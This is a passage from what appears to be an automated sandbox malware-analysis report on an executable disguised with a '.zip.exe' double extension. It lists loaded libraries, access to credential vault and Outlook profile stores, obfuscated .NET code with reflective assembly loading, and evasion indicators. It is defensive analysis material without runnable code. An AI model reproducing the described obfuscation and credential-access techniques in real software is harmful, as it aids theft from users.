                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Gd3lOevK672JYIK.zip.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Gd3lOevK672JYIK.zip.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: net.pdbUGP source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gd3lOevK672JYIK.zip.exe, Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: net.pdb source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TjdgrMPwNLGImh.exe, 0000000A.00000000.2563425890.000000000085F000.00000002.00000001.01000000.0000000C.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714217135.000000000085F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | .Net Code: m4PmYcEFUM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | .Net Code: m4PmYcEFUM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | .Net Code: m4PmYcEFUM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.3cc9f78.1.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.3ca9f58.3.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 0_2_06D4AC98 push eax; iretd | 0_2_06D4AC99
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 0_2_06D4C0D0 push cs; ret | 0_2_06D4C0D1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00413863 push ecx; retf E958h | 4_2_00413919
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00401868 push 0000003Dh; retf | 4_2_00401899
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00417828 push esi; iretd | 4_2_00417848
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0041F0C3 push edi; iretd | 4_2_0041F0CF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_004031B0 push eax; ret | 4_2_004031B2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00404B72 push edi; ret | 4_2_00404B7A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0041738C push ds; retf | 4_2_004173A1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_004083BA push esi; iretd | 4_2_004083F5
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00404C4C pushfd ; ret | 4_2_00404C4D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0041556F push eax; retf | 4_2_00415572
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_004145BD push 00000034h; iretd | 4_2_004145BF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_00415EBF push esp; iretd | 4_2_00415ECC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0181225F pushad ; ret | 4_2_018127F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018127FA pushad ; ret | 4_2_018127F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018409AD push ecx; mov dword ptr [esp], ecx | 4_2_018409B6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0181283D push eax; iretd | 4_2_01812858
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01811200 push eax; iretd | 4_2_01811369
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0489B4BC push eax; retf | 10_2_0489B4BF
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0489C4FB push edx; retf | 10_2_0489C501
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0489BE0C push esp; iretd | 10_2_0489BE19
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0489D774 push esi; iretd | 10_2_0489D795
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_048A5010 push edi; iretd | 10_2_048A501C
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0488AABF push edi; ret | 10_2_0488AAC7
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0489D2D9 push ds; retf | 10_2_0489D2EE
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0488AB99 pushfd ; ret | 10_2_0488AB9A
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Code function: 10_2_0488E307 push esi; iretd | 10_2_0488E342
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_0302225F pushad ; ret | 11_2_030227F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030227FA pushad ; ret | 11_2_030227F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 11_2_030509AD push ecx; mov dword ptr [esp], ecx | 11_2_030509B6
                Source: Gd3lOevK672JYIK.zip.exe | Static PE information: section name: .text entropy: 7.722966288438935
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, sfF1AvkoUaYuUINDnp.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Kk2bx9Fwew', 'CDtbj2T5mJ', 'sNybzHoDnr', 'un1Juw7LXJ', 'Bj3Jvi0EUR', 'XUFJbRWhXN', 'CTNJJeDfYH', 'HZRLvvXibY7JOXgyUAW'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, EOl4M4m0EwEs0A4E1N.cs | High entropy of concatenated method names: 'zpJpABQWE9', 'MTopqyBVtf', 'pExppQnRJW', 'DN6pfAXrxw', 'VpspHt8uvZ', 'kcZpTYFpxZ', 'Dispose', 'WxTdVZZXMm', 'VCvdskF0WY', 'qEsd4nVDvi'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, Q0QXQTVYbrCmLqw9blB.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ngX9pb62EP', 'TJa9hbBLu8', 'amm9fObl6e', 'NsM99ASjQC', 'ovH9HGauvO', 'zlo92vBNqB', 'QhP9TePTeR'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, icu7vy73dA81VP8Gl9.cs | High entropy of concatenated method names: 'ToString', 'pS0XMlLdBn', 'PhoXSLnNwJ', 'GeVXlkARBh', 'WE3X7Yhd2Q', 'QIEXrAP1bX', 'JDEXoHBVnm', 'aMIX0kr2gu', 'OybXCyAxnt', 'Sb5XyqwfON'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, wTJkkY3RGXoYNOE4fQ.cs | High entropy of concatenated method names: 'R4dA3WkGpb', 'LbgAneaQqf', 'mDQAgyhHS1', 'Ko7Aa3K1AU', 'XwDASxrmmP', 'XbeAloIgVC', 'gSsA7qZmkd', 'vZxArJh4FU', 'LAkAoFryXw', 'uFXA02OkNS'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, SpYqQbJxQTpD4vNABf.cs | High entropy of concatenated method names: 'zmgIUrN839', 'xvgIF1X6E7', 'LQQIKPjRXE', 'E3sIS4qy5Y', 'IRbI7GVPCR', 'S2yIrXMUZm', 'JHOI08iGqs', 'dscICsNiGe', 'krII3TFoco', 'TYhIMVbPNQ'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, LQqdA6ckXYOJRum1Vw.cs | High entropy of concatenated method names: 's0uh4VpAjY', 'aNAhZ4WaRg', 'H5IhPClYbr', 'NR7hEs4Y09', 'qD7hp0Crbo', 'xN3hBw3KD9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | High entropy of concatenated method names: 'RJZJRqibdG', 'TUtJVYUmKV', 'lJOJsrrxc7', 'GqwJ47YnLc', 'ngoJZQZb90', 'dGpJPUUN4l', 'vWlJE6YRfN', 'agCJBFB9fZ', 'lD8JNqbo3j', 'MVKJeSNA7J'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gbIZeiEITbeEjX9v2O.cs | High entropy of concatenated method names: 'LI9qWC8Xt9', 'l4TqjsdbcU', 'qcbdujwNhq', 'sNjdvmvnbO', 'WhJqMlG8lS', 'vKvqnO9FLS', 'VMXq6V1C2p', 'Vt0qglbuIX', 'nR6qaAS19B', 'BpXqcr0AK4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, dUgE0WFeMmwqcthSsi.cs | High entropy of concatenated method names: 'LxSpKunyLG', 'EmipS7cUvO', 'reZplytebB', 'qXYp7ViAN0', 'UseprlZm4u', 'yurpoNgc1T', 'Qf5p0O6eO8', 'VdBpCIbdwE', 'Ng9py077JA', 'usBp3Wdm8F'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, tmug9NaSrarT6mnnuH.cs | High entropy of concatenated method names: 'zSgsgr5CxO', 'vgxsaQkpBx', 'wdfscnXyNe', 'AM1sDqTPGQ', 'n1Aswu4GFZ', 'B4Hs191SOZ', 'k61s523d9o', 'Sb5sW190WD', 'A00sx4PZbt', 'ECjsjcKly6'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, JqFSsZtBBDaoutcR4d.cs | High entropy of concatenated method names: 'oZ7PR8dPKH', 'I9WPs072c9', 'zZOPZFrB9u', 'v0jPEKY0yW', 'TqmPBGFt1E', 'O4IZwPT9lJ', 'wiAZ1e6ElP', 'VkSZ53bfSr', 'uIMZWblZGM', 'p2lZxuMo9E'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, SX3KtaS81LM1DEh2Pi.cs | High entropy of concatenated method names: 'Dispose', 'h4qvx2jO34', 'YgKbSSN5br', 'Ytf9w6ldeY', 'zLhvjHnoRu', 'oXkvzdMoZj', 'ProcessDialogKey', 'kHHbuquu4I', 'BWQbvojmhF', 'tOCbbpln8P'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, r7grjtYOFfuOwO35vD.cs | High entropy of concatenated method names: 'yegvEDcIbV', 'mY1vB4Em1y', 'wFqve6gci2', 'HvHvtN7OPf', 'tgPvAt5rVw', 'ucUvXTa5Ac', 'YO9QHlQSbR6eE8TRX4', 'RcRojusiiIgKxGO1EY', 'rkG6mtO0O3qnY366Nd', 'FcivvErK7p'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, xHuCyUNVgijPJihWyi.cs | High entropy of concatenated method names: 'xoFPcx3ZiE', 'YnNPDLiG3t', 'RCwPwFVY2E', 'ToString', 'oOJP13MVsF', 'xxCP5E8Ja7', 'Csu4ZQLvS0AiyPBemsw', 'to9lJJLDhgsG1gb2D7Y', 'KQGA2dLeV8iU7nLthkZ', 'IILaK9LMZeF9SKxHe59'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, IawIjFBJhrAMATLEmD.cs | High entropy of concatenated method names: 'qUlY6BoWq', 'mEvkFZlVg', 'agDGWdPXj', 'g4p8TBGQR', 'oAjFxEl3r', 'GraOsrfU2', 'ktXcPMmSCL5VbVDKfo', 'MwK1ia9WFikwuWwM5O', 'X4GdxHS9K', 'BCghFmMWI'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, OKdsLYz9V6KEiBqfMy.cs | High entropy of concatenated method names: 'Gk4hGnxVAq', 'gHShUoVm3S', 'kJyhFrmBgq', 'yMfhKvpSZy', 'U38hSXlAYr', 'wQOh7JI9f7', 'fMXhrfR8mY', 'XjNhTod5al', 'YM4hij5SBB', 'Ah2hQg0UF7'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, NlGL1XOTFh72rhSpbZ.cs | High entropy of concatenated method names: 'oC5ZLZVitX', 'yh7Z87vsXT', 'koW4lLrdZI', 'FiN47NypZL', 'IQ84ryo9kM', 'aUm4o03Gxa', 'CnV40y9T09', 'VMU4Cpt1eK', 'NSf4yyXG6l', 'F2243qY39k'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, Nu12WkVVrJhpkFxrfpy.cs | High entropy of concatenated method names: 'TlihjTIt1C', 'nC2hz1bVdy', 'kuefuGTZC2', 'p8gfvdnLwh', 'CC7fb32jmT', 'voGfJZRUWx', 'aZafmCM4jk', 'DELfRIAZeZ', 'k9cfVH857e', 'zfSfsKyZYU'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, lnvcOeVRwtKOkU4lWK5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YDShMMbwdH', 'qGKhnrw9j5', 'jTUh6kq4vm', 'wqJhgSKd2x', 'sa4hat0nMl', 'XcMhcWH6aW', 'HZHhDp7u6B'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, BhpI7xZJ8bG6DnnZfg.cs | High entropy of concatenated method names: 'DdIEiehfYv', 'YshEQmYQlS', 'XQ5EYGk4yT', 'zxQEkoNKe8', 'vaDELYt82D', 'zV4EGiRB5n', 'CJGE880MBB', 'ClWEUNAagc', 'TwaEFKoq4R', 'H6XEOhsXbA'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, kg1CTFWYTIlJYyVcQL.cs | High entropy of concatenated method names: 'dD7EVFSwvH', 'DCEE4OP7SF', 'sK2EPPxwW1', 'LdnPj9AcZE', 'uK8PzkoVjn', 'vLvEu3jxpX', 'kpWEvtJd1M', 'o0nEbwTT7V', 'jsnEJAZJiy', 'm5JEmp8HF4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, dJ60rUjheZ1KB4814D.cs | High entropy of concatenated method names: 'htx4kHZgSD', 'Lma4G1MOMo', 'rot4U9fPUc', 'IjT4FfcNgv', 'bWy4AC17p8', 'E8F4XKrL6N', 'rE64qyl1pj', 'qIa4dQmeWr', 'Po54pmnthO', 'dQ34hbCGqp'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, O8v7FsG65UW97xjpg0.cs | High entropy of concatenated method names: 'meCqes7rLd', 'IjHqtudB5N', 'ToString', 'vhqqV8ghXN', 'usCqsVUx2p', 'KLoq4Xy7SA', 'iaiqZLDhVE', 'heoqPiaebU', 'DEmqE5N9hO', 'BdRqBMWfnf'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, sfF1AvkoUaYuUINDnp.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Kk2bx9Fwew', 'CDtbj2T5mJ', 'sNybzHoDnr', 'un1Juw7LXJ', 'Bj3Jvi0EUR', 'XUFJbRWhXN', 'CTNJJeDfYH', 'HZRLvvXibY7JOXgyUAW'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, EOl4M4m0EwEs0A4E1N.cs | High entropy of concatenated method names: 'zpJpABQWE9', 'MTopqyBVtf', 'pExppQnRJW', 'DN6pfAXrxw', 'VpspHt8uvZ', 'kcZpTYFpxZ', 'Dispose', 'WxTdVZZXMm', 'VCvdskF0WY', 'qEsd4nVDvi'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, Q0QXQTVYbrCmLqw9blB.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ngX9pb62EP', 'TJa9hbBLu8', 'amm9fObl6e', 'NsM99ASjQC', 'ovH9HGauvO', 'zlo92vBNqB', 'QhP9TePTeR'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, icu7vy73dA81VP8Gl9.cs | High entropy of concatenated method names: 'ToString', 'pS0XMlLdBn', 'PhoXSLnNwJ', 'GeVXlkARBh', 'WE3X7Yhd2Q', 'QIEXrAP1bX', 'JDEXoHBVnm', 'aMIX0kr2gu', 'OybXCyAxnt', 'Sb5XyqwfON'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, wTJkkY3RGXoYNOE4fQ.cs | High entropy of concatenated method names: 'R4dA3WkGpb', 'LbgAneaQqf', 'mDQAgyhHS1', 'Ko7Aa3K1AU', 'XwDASxrmmP', 'XbeAloIgVC', 'gSsA7qZmkd', 'vZxArJh4FU', 'LAkAoFryXw', 'uFXA02OkNS'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, SpYqQbJxQTpD4vNABf.cs | High entropy of concatenated method names: 'zmgIUrN839', 'xvgIF1X6E7', 'LQQIKPjRXE', 'E3sIS4qy5Y', 'IRbI7GVPCR', 'S2yIrXMUZm', 'JHOI08iGqs', 'dscICsNiGe', 'krII3TFoco', 'TYhIMVbPNQ'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, LQqdA6ckXYOJRum1Vw.cs | High entropy of concatenated method names: 's0uh4VpAjY', 'aNAhZ4WaRg', 'H5IhPClYbr', 'NR7hEs4Y09', 'qD7hp0Crbo', 'xN3hBw3KD9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | High entropy of concatenated method names: 'RJZJRqibdG', 'TUtJVYUmKV', 'lJOJsrrxc7', 'GqwJ47YnLc', 'ngoJZQZb90', 'dGpJPUUN4l', 'vWlJE6YRfN', 'agCJBFB9fZ', 'lD8JNqbo3j', 'MVKJeSNA7J'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gbIZeiEITbeEjX9v2O.cs | High entropy of concatenated method names: 'LI9qWC8Xt9', 'l4TqjsdbcU', 'qcbdujwNhq', 'sNjdvmvnbO', 'WhJqMlG8lS', 'vKvqnO9FLS', 'VMXq6V1C2p', 'Vt0qglbuIX', 'nR6qaAS19B', 'BpXqcr0AK4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, dUgE0WFeMmwqcthSsi.cs | High entropy of concatenated method names: 'LxSpKunyLG', 'EmipS7cUvO', 'reZplytebB', 'qXYp7ViAN0', 'UseprlZm4u', 'yurpoNgc1T', 'Qf5p0O6eO8', 'VdBpCIbdwE', 'Ng9py077JA', 'usBp3Wdm8F'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, tmug9NaSrarT6mnnuH.cs | High entropy of concatenated method names: 'zSgsgr5CxO', 'vgxsaQkpBx', 'wdfscnXyNe', 'AM1sDqTPGQ', 'n1Aswu4GFZ', 'B4Hs191SOZ', 'k61s523d9o', 'Sb5sW190WD', 'A00sx4PZbt', 'ECjsjcKly6'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, JqFSsZtBBDaoutcR4d.cs | High entropy of concatenated method names: 'oZ7PR8dPKH', 'I9WPs072c9', 'zZOPZFrB9u', 'v0jPEKY0yW', 'TqmPBGFt1E', 'O4IZwPT9lJ', 'wiAZ1e6ElP', 'VkSZ53bfSr', 'uIMZWblZGM', 'p2lZxuMo9E'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, SX3KtaS81LM1DEh2Pi.csHigh entropy of concatenated method names: 'Dispose', 'h4qvx2jO34', 'YgKbSSN5br', 'Ytf9w6ldeY', 'zLhvjHnoRu', 'oXkvzdMoZj', 'ProcessDialogKey', 'kHHbuquu4I', 'BWQbvojmhF', 'tOCbbpln8P'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, r7grjtYOFfuOwO35vD.csHigh entropy of concatenated method names: 'yegvEDcIbV', 'mY1vB4Em1y', 'wFqve6gci2', 'HvHvtN7OPf', 'tgPvAt5rVw', 'ucUvXTa5Ac', 'YO9QHlQSbR6eE8TRX4', 'RcRojusiiIgKxGO1EY', 'rkG6mtO0O3qnY366Nd', 'FcivvErK7p'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, xHuCyUNVgijPJihWyi.csHigh entropy of concatenated method names: 'xoFPcx3ZiE', 'YnNPDLiG3t', 'RCwPwFVY2E', 'ToString', 'oOJP13MVsF', 'xxCP5E8Ja7', 'Csu4ZQLvS0AiyPBemsw', 'to9lJJLDhgsG1gb2D7Y', 'KQGA2dLeV8iU7nLthkZ', 'IILaK9LMZeF9SKxHe59'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, IawIjFBJhrAMATLEmD.csHigh entropy of concatenated method names: 'qUlY6BoWq', 'mEvkFZlVg', 'agDGWdPXj', 'g4p8TBGQR', 'oAjFxEl3r', 'GraOsrfU2', 'ktXcPMmSCL5VbVDKfo', 'MwK1ia9WFikwuWwM5O', 'X4GdxHS9K', 'BCghFmMWI'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, OKdsLYz9V6KEiBqfMy.csHigh entropy of concatenated method names: 'Gk4hGnxVAq', 'gHShUoVm3S', 'kJyhFrmBgq', 'yMfhKvpSZy', 'U38hSXlAYr', 'wQOh7JI9f7', 'fMXhrfR8mY', 'XjNhTod5al', 'YM4hij5SBB', 'Ah2hQg0UF7'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, NlGL1XOTFh72rhSpbZ.csHigh entropy of concatenated method names: 'oC5ZLZVitX', 'yh7Z87vsXT', 'koW4lLrdZI', 'FiN47NypZL', 'IQ84ryo9kM', 'aUm4o03Gxa', 'CnV40y9T09', 'VMU4Cpt1eK', 'NSf4yyXG6l', 'F2243qY39k'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, Nu12WkVVrJhpkFxrfpy.csHigh entropy of concatenated method names: 'TlihjTIt1C', 'nC2hz1bVdy', 'kuefuGTZC2', 'p8gfvdnLwh', 'CC7fb32jmT', 'voGfJZRUWx', 'aZafmCM4jk', 'DELfRIAZeZ', 'k9cfVH857e', 'zfSfsKyZYU'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, lnvcOeVRwtKOkU4lWK5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YDShMMbwdH', 'qGKhnrw9j5', 'jTUh6kq4vm', 'wqJhgSKd2x', 'sa4hat0nMl', 'XcMhcWH6aW', 'HZHhDp7u6B'

                Hooking and other Techniques for Hiding and Protection

                Source: Possible double extension: zip.exe | Static PE information: Gd3lOevK672JYIK.zip.exe
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: Gd3lOevK672JYIK.zip.exe PID: 3172, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFDB442D544
